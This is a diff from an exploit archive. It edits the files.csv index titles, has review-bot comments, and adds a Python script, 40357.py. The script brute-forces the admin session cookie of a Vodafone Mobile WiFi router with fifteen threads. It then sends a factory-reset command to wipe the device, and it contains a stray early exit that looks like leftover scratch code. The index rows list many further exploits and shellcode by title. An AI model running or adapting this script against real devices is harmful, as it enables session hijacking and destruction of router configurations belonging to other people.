14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
|
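Review bot: The context rows around 12689 (12686 and 12691) still carry a parenthesised qualifier, "(Authentication Bypass) SQL Injection", so after this change the file mixes both styles within a few lines. Either include those rows in the same normalisation or state in the commit message that only the "(Authenticated)" tag is in scope, so anyone filtering on the description column knows which form to expect.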
@ -12649,10 +12649,10 @@ id,file,description,date,author,platform,type,port
|
|||
14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
|
||||
14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0
|
||||
14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0
|
||||
14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0
|
||||
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
|
||||
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
|
||||
14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
|
||||
14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0
|
||||
14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
|
||||
|
@ -12692,7 +12692,7 @@ id,file,description,date,author,platform,type,port
|
|||
14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0
|
||||
14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
|
||||
14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
|
||||
14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0
|
||||
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
|
||||
14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
|
||||
|
@ -12721,7 +12721,7 @@ id,file,description,date,author,platform,type,port
|
|||
14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0
|
||||
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0
|
||||
14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0
|
||||
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
|
||||
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
|
||||
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
|
||||
14488,platforms/php/webapps/14488.txt,"joomla Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
|
||||
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0
|
||||
|
@ -12818,7 +12818,7 @@ id,file,description,date,author,platform,type,port
|
|||
14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
|
||||
14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
|
||||
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0
|
||||
14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
|
||||
14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
|
||||
14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
|
||||
14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
|
||||
14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80
|
||||
|
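Review bot: The author field on the 14623 row still ends in a trailing space ("Glafkos Charalambous ") even though this hunk edits the same row's title. Since the row is being touched anyway, trim the field so that exact-match lookups and de-duplication on author name do not treat it as a different person.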
@ -14004,7 +14004,7 @@ id,file,description,date,author,platform,type,port
|
|||
16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
|
||||
16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
|
||||
16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps,0
|
||||
16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
|
||||
16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
|
||||
16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
|
||||
16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
|
||||
16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
|
||||
|
@ -15100,7 +15100,7 @@ id,file,description,date,author,platform,type,port
|
|||
17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0
|
||||
17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0
|
||||
17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Authenticated) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
|
||||
17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Authenticated Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
|
||||
17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
|
||||
17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0
|
||||
17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0
|
||||
|
@ -19332,7 +19332,7 @@ id,file,description,date,author,platform,type,port
|
|||
22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0
|
||||
22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0
|
||||
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
|
||||
22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
|
||||
22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
|
||||
22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0
|
||||
22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0
|
||||
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
|
||||
|
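Review bot: The two versions of the 22069 row in this hunk read the same character for character as displayed, so the change must be whitespace or some other invisible byte. State in the commit message what was normalised on this row, otherwise the edit cannot be checked from the diff.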
@ -21659,7 +21659,7 @@ id,file,description,date,author,platform,type,port
|
|||
24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24479,platforms/windows/remote/24479.py,"Freefloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0
|
||||
24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Authenticated) Remote Command Execution",2013-02-11,aeon,php,webapps,0
|
||||
24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0
|
||||
24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
|
||||
24483,platforms/hardware/webapps/24483.txt,"TP-Link Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0
|
||||
24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0
|
||||
|
@ -25700,6 +25700,7 @@ id,file,description,date,author,platform,type,port
|
|||
28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0
|
||||
28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - '.wav' Crash (PoC)",2013-09-30,xboz,windows,dos,0
|
||||
28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x - admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
|
||||
40359,platforms/osx/webapps/40359.txt,"Airmail 3.0.2 - Cross-Site Scripting",2016-09-09,redrain,osx,webapps,0
|
||||
28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x - view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
|
||||
28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x - view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
|
||||
28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
|
||||
|
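Review bot: The new 40359 row files a mail-client issue under osx/webapps with platform osx, while the advisory added in this same commit gives the platform as "OS X and iOS". Either mention iOS in the title or explain the choice of category, so that anyone filtering files.csv by platform for iOS software does not miss the entry.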
@ -27957,6 +27958,7 @@ id,file,description,date,author,platform,type,port
|
|||
31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps,0
|
||||
31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0
|
||||
31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps,0
|
||||
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
|
||||
31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page - SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps,0
|
||||
31071,platforms/cgi/webapps/31071.txt,"VB Marketing - 'tseekdir.cgi' Local File Inclusion",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
|
||||
31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 - FileUpload Class Unauthorized File Upload",2007-01-05,titon,windows,remote,0
|
||||
|
@ -28056,6 +28058,7 @@ id,file,description,date,author,platform,type,port
|
|||
31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0
|
||||
31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0
|
||||
31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting",2008-03-05,ZoRLu,php,webapps,0
|
||||
40357,platforms/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80
|
||||
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
|
||||
31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
|
||||
31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0
|
||||
|
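Review bot: The title on the new 40357 row, "Reset Admin Password", understates what the script added in this commit does: it posts goformId=RESTORE_FACTORY_SETTINGS, which is a full factory restore, and it gets there by guessing the stok session cookie. Suggest a title that names both the weakness and the effect, so that owners of the device can judge the impact from the index alone.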
@ -28430,7 +28433,7 @@ id,file,description,date,author,platform,type,port
|
|||
31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
|
||||
31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
|
||||
31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0
|
||||
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 - 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
|
||||
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
|
||||
31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
|
||||
31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
|
||||
31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
|
||||
|
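Review bot: The replacement title "Zabbix 2.0 < 3.0.3" on the 40353 row is harder to read than the range it replaces, because it does not say whether 3.0.3 itself is affected. Elsewhere in this file "<" is used with a single version ("Concrete CMS < 5.5.21"); for a bounded range, state both bounds and whether the upper one is inclusive.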
@ -33616,7 +33619,7 @@ id,file,description,date,author,platform,type,port
|
|||
37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0
|
||||
37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0
|
||||
37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0
|
||||
37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
|
||||
37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
|
||||
37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0
|
||||
37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0
|
||||
37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0
|
||||
|
@ -34709,7 +34712,7 @@ id,file,description,date,author,platform,type,port
|
|||
38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
|
||||
38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
|
||||
38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
|
||||
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
|
||||
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
|
||||
38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0
|
||||
38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
|
||||
38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0
|
||||
|
@ -35517,8 +35520,8 @@ id,file,description,date,author,platform,type,port
|
|||
39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0
|
||||
39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/treemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/zoomabletreemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
|
||||
39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
|
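Review bot: Dropping the "(SSRF)" suffix from the 39258 and 39259 titles means a search of files.csv for the acronym no longer finds these rows. If the goal is consistent titles, keep the acronym somewhere searchable or confirm that the search tooling matches on "Server Side Request Forgery".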
@ -36394,7 +36397,7 @@ id,file,description,date,author,platform,type,port
|
|||
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
|
||||
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80
|
||||
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
|
||||
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
|
||||
40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
|
||||
40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
|
||||
|
|
|
116
platforms/hardware/webapps/40357.py
Executable file
|
@ -0,0 +1,116 @@
|
|||
import urllib2
|
||||
import json
|
||||
from datetime import datetime, timedelta
|
||||
import time
|
||||
import httplib
|
||||
from threading import Thread
|
||||
from Queue import Queue
|
||||
from multiprocessing import process
|
||||
|
||||
|
||||
print """
|
||||
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
|
||||
"""
|
||||
thread_lock = False
|
||||
session = ""
|
||||
def unix_time_millis(dt):
|
||||
epoch = datetime.utcfromtimestamp(0)
|
||||
return int(((dt - epoch).total_seconds() * 1000.0) / 1000)
|
||||
|
||||
a=False
|
||||
|
||||
def check_process_output():
|
||||
print 1
|
||||
|
||||
p = process.Process(target=check_process_output)
|
||||
p.start()
|
||||
|
||||
print a
|
||||
exit(0)
|
||||
|
||||
def crack(queue):
|
||||
global thread_lock
|
||||
global session
|
||||
while True:
|
||||
if thread_lock:
|
||||
exit(0)
|
||||
if not queue.empty():
|
||||
cookie = queue.get()
|
||||
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie}
|
||||
req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
|
||||
% time.time(), None, headers)
|
||||
result = urllib2.urlopen(req).read()
|
||||
if json.loads(result)["AuthMode"] != "":
|
||||
print "[+] Found valid admin session!"
|
||||
print "[INFO] Terminating other threads ... please wait"
|
||||
session = cookie
|
||||
queue.task_done()
|
||||
thread_lock = True
|
||||
|
||||
|
||||
def start_threads_with_args(target, n, arg):
|
||||
thread_pool = []
|
||||
for n_threads in range(0, n):
|
||||
thread = Thread(target=target, args=(arg,))
|
||||
thread_pool.append(thread)
|
||||
thread_pool[-1].start()
|
||||
return thread_pool
|
||||
|
||||
def start_bruteforce():
|
||||
global session
|
||||
global thread_lock
|
||||
queue = Queue(0)
|
||||
start_threads_with_args(crack, 15, queue)
|
||||
print"[!] Trying fast bruteforce..."
|
||||
for x in range(0, 1000):
|
||||
if thread_lock:
|
||||
break
|
||||
queue.put("123abc456def789%03d" % x)
|
||||
while True:
|
||||
if session != "":
|
||||
return session
|
||||
if queue.empty():
|
||||
break
|
||||
print "[!] Trying slow bruteforce..."
|
||||
for milliseconds in range(0, how_many):
|
||||
if thread_lock:
|
||||
break
|
||||
queue.put("123abc456def789%s" % (start + milliseconds))
|
||||
while True:
|
||||
if session != "":
|
||||
return session
|
||||
if queue.empty():
|
||||
break
|
||||
return session
|
||||
if __name__ == "__main__":
|
||||
now = datetime.now()
|
||||
hours = raw_input("How many hours ago admin logged in: ")
|
||||
minutes = raw_input("How many minutes ago admin logged in: ")
|
||||
init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
|
||||
end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
|
||||
start = unix_time_millis(init)
|
||||
how_many = unix_time_millis(end) - start + 1
|
||||
print "[+] Starting session bruteforce with 15 threads"
|
||||
valid_session = ""
|
||||
try:
|
||||
valid_session = start_bruteforce()
|
||||
except KeyboardInterrupt:
|
||||
print "[-] Exiting.."
|
||||
thread_lock = True
|
||||
exit(0)
|
||||
if valid_session == "":
|
||||
print "[!] Can't find valid session :( quitting..."
|
||||
exit(0)
|
||||
print "[+] Resetting router password to 'admin' , network may be down for a while"
|
||||
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session}
|
||||
req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
|
||||
"goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
|
||||
try:
|
||||
urllib2.urlopen(req).read()
|
||||
except httplib.BadStatusLine:
|
||||
print "[!] Password resetted to admin! have fun!"
|
||||
exit(0)
|
||||
except Exception:
|
||||
print "[x] Error during password reset"
|
||||
print "[-] Can't reset password try manually, your session is: %s" % valid_session
|
||||
|
|
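Review bot: Missing documentation at the top of 40357.py: nothing states the affected device model or firmware, the vendor contact, or the weakness being used, which a reader has to infer from the code (the stok cookie is tried as the fixed string 123abc456def789 followed by a counter or an epoch timestamp). Add a header like the one on 40358.py in this commit. The block between unix_time_millis and crack (a=False, check_process_output, the Process start and exit(0)) and the multiprocessing import look like leftover scratch code and should be raised with the submitter, and the address 192.168.0.1 is hard-coded in several places.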
@ -1,4 +1,6 @@
|
|||
'''
|
||||
|
||||
/*
|
||||
|
||||
add by SpeeDr00t@Blackfalcon (jang kyoung chip)
|
||||
|
||||
This is a published vulnerability by google in the past.
|
||||
|
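Review bot: Wrapping the header in a ''' docstring while keeping the C-style /* marker inside it (and its closing */ further down) leaves two comment syntaxes around the same text in a Python file. Drop the /* and */ lines so the docstring is the only delimiter.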
@ -14,9 +16,7 @@ it was missing information on shellcode.
|
|||
So, I tried to completed the shellcode.
|
||||
In the future, I hope to help your study.
|
||||
|
||||
|
||||
(gdb) gdb -q client1
|
||||
Undefined command: "gdb". Try "help".
|
||||
|
||||
(gdb) r
|
||||
Starting program: /home/haker/client1
|
||||
Got object file from memory but can't read symbols: File truncated.
|
||||
|
@ -27,8 +27,8 @@ sendto 1
|
|||
TCP Connected with 127.0.0.1:60259
|
||||
